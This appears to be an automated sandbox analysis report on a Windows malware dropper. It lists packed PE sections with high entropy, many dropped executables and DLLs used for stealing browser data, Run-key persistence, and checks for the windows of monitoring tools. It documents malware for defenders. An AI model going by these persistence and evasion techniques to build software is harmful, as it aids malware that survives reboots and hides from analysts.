                              Source: random[2].exe1.6.drStatic PE information: section name: .taggant
                              Source: d0e32932f8.exe.6.drStatic PE information: section name:
                              Source: d0e32932f8.exe.6.drStatic PE information: section name: .idata
                              Source: d0e32932f8.exe.6.drStatic PE information: section name: hvxywfyw
                              Source: d0e32932f8.exe.6.drStatic PE information: section name: megudfof
                              Source: d0e32932f8.exe.6.drStatic PE information: section name: .taggant
                              Source: random[5].exe.6.drStatic PE information: section name: .eh_fram
                              Source: cd81608004.exe.6.drStatic PE information: section name: .eh_fram
                              Source: e637491e0c.exe.6.drStatic PE information: section name:
                              Source: e637491e0c.exe.6.drStatic PE information: section name: .idata
                              Source: e637491e0c.exe.6.drStatic PE information: section name:
                              Source: e637491e0c.exe.6.drStatic PE information: section name: hvytnhuk
                              Source: e637491e0c.exe.6.drStatic PE information: section name: duidxfgh
                              Source: e637491e0c.exe.6.drStatic PE information: section name: .taggant
                              Source: 62a707bc2a.exe.6.drStatic PE information: section name: .fptable
                              Source: 178ba86573.exe.6.drStatic PE information: section name:
                              Source: 178ba86573.exe.6.drStatic PE information: section name: .idata
                              Source: 178ba86573.exe.6.drStatic PE information: section name:
                              Source: 178ba86573.exe.6.drStatic PE information: section name: uqowvfqu
                              Source: 178ba86573.exe.6.drStatic PE information: section name: prbaxlvy
                              Source: 178ba86573.exe.6.drStatic PE information: section name: .taggant
                              Source: random[3].exe1.6.drStatic PE information: section name:
                              Source: random[3].exe1.6.drStatic PE information: section name: .idata
                              Source: random[3].exe1.6.drStatic PE information: section name: zrghudyy
                              Source: random[3].exe1.6.drStatic PE information: section name: fscodnir
                              Source: random[3].exe1.6.drStatic PE information: section name: .taggant
                              Source: 6f3b41816f.exe.6.drStatic PE information: section name:
                              Source: 6f3b41816f.exe.6.drStatic PE information: section name: .idata
                              Source: 6f3b41816f.exe.6.drStatic PE information: section name: zrghudyy
                              Source: 6f3b41816f.exe.6.drStatic PE information: section name: fscodnir
                              Source: 6f3b41816f.exe.6.drStatic PE information: section name: .taggant
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe.12.drStatic PE information: section name: .00cfg
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDD91C push ecx; ret 0_2_00BDD92F
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD1359 push es; ret 0_2_00BD135A
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00EBD91C push ecx; ret 1_2_00EBD92F
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00EBD91C push ecx; ret 2_2_00EBD92F
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 9_2_002D534A push ecx; ret 9_2_002D535D
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 11_3_00BE4669 pushfd ; retf 11_3_00BE466A
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 11_3_00B80840 push eax; ret 11_3_00B80841
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 11_3_00B80840 push eax; ret 11_3_00B80841
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 11_3_00B80840 push eax; ret 11_3_00B80841
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 11_3_00B80840 push eax; ret 11_3_00B80841
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 11_3_00B80840 push eax; ret 11_3_00B80841
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 11_3_00B80840 push eax; ret 11_3_00B80841
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 11_3_00B80840 push eax; ret 11_3_00B80841
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 11_3_00B80840 push eax; ret 11_3_00B80841
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 11_3_00B80840 push eax; ret 11_3_00B80841
                              Source: file.exeStatic PE information: section name: entropy: 7.057980979181412
                              Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.057980979181412
                              Source: random[3].exe.6.drStatic PE information: section name: entropy: 7.980952558000639
                              Source: random[3].exe.6.drStatic PE information: section name: wekcazbo entropy: 7.952954751128578
                              Source: 74b92d58dc.exe.6.drStatic PE information: section name: entropy: 7.980952558000639
                              Source: 74b92d58dc.exe.6.drStatic PE information: section name: wekcazbo entropy: 7.952954751128578
                              Source: random[1].exe2.6.drStatic PE information: section name: hvytnhuk entropy: 7.954914945137012
                              Source: 932bb971c3.exe.6.drStatic PE information: section name: hvytnhuk entropy: 7.954914945137012
                              Source: random[2].exe.6.drStatic PE information: section name: uqowvfqu entropy: 7.948053672038302
                              Source: c9692f9101.exe.6.drStatic PE information: section name: uqowvfqu entropy: 7.948053672038302
                              Source: random[3].exe0.6.drStatic PE information: section name: agnlrrtx entropy: 7.955768774106295
                              Source: e577d0589a.exe.6.drStatic PE information: section name: agnlrrtx entropy: 7.955768774106295
                              Source: random[2].exe0.6.drStatic PE information: section name: entropy: 7.977980523769075
                              Source: random[2].exe0.6.drStatic PE information: section name: lukocbxy entropy: 7.955080919971714
                              Source: ed7d415177.exe.6.drStatic PE information: section name: entropy: 7.977980523769075
                              Source: ed7d415177.exe.6.drStatic PE information: section name: lukocbxy entropy: 7.955080919971714
                              Source: e637491e0c.exe.6.drStatic PE information: section name: hvytnhuk entropy: 7.954914945137012
                              Source: 178ba86573.exe.6.drStatic PE information: section name: uqowvfqu entropy: 7.948053672038302

                              Persistence and Installation Behavior

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\Users\user\Documents\KEGDAKEHJD.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019663001\a2870b1ac5.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeFile created: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[4].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile created: C:\Users\user\AppData\Local\Temp\7XY747NZYRMTKXB1.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile created: C:\Users\user\AppData\Local\Temp\service123.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019682001\62a707bc2a.exeJump to dropped file
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019679001\cd81608004.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeFile created: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[5].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[3].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\Users\user\Documents\KEGDAKEHJD.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019678001\e577d0589a.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019677001\fbaaecbd82.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019676001\6cc6a39605.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[4].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeFile created: C:\Users\user\AppData\Local\Temp\Ae01fdzV5f53ffefSw3BEvKVeV\Bunifu_UI_v1.5.3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile created: C:\Users\user\AppData\Local\Temp\STNCYC18XSKVTIXIDORVU8IVIC8XE.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019680001\92aba5cf15.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019684001\178ba86573.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019681001\e637491e0c.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019683001\796ecf2647.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeFile created: C:\Users\user\AppData\Local\Temp\O36B9WQQ11YC67FWH57AOX5NF.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeFile created: C:\Users\user\AppData\Local\Temp\Ae01fdzV5f53ffefSw3BEvKVeV\Y-Cleaner.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]Jump to dropped file

                              Boot Survival

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d0e32932f8.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bc893816fa.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ed7d415177.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6f3b41816f.exeJump to behavior
                              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeWindow searched: window name: Filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeWindow searched: window name: Filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow searched: window name: Filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeWindow searched: window name: Filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow searched: window name: Filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeWindow searched: window name: Filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeWindow searched: window name: Filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeWindow searched: window name: FilemonClass
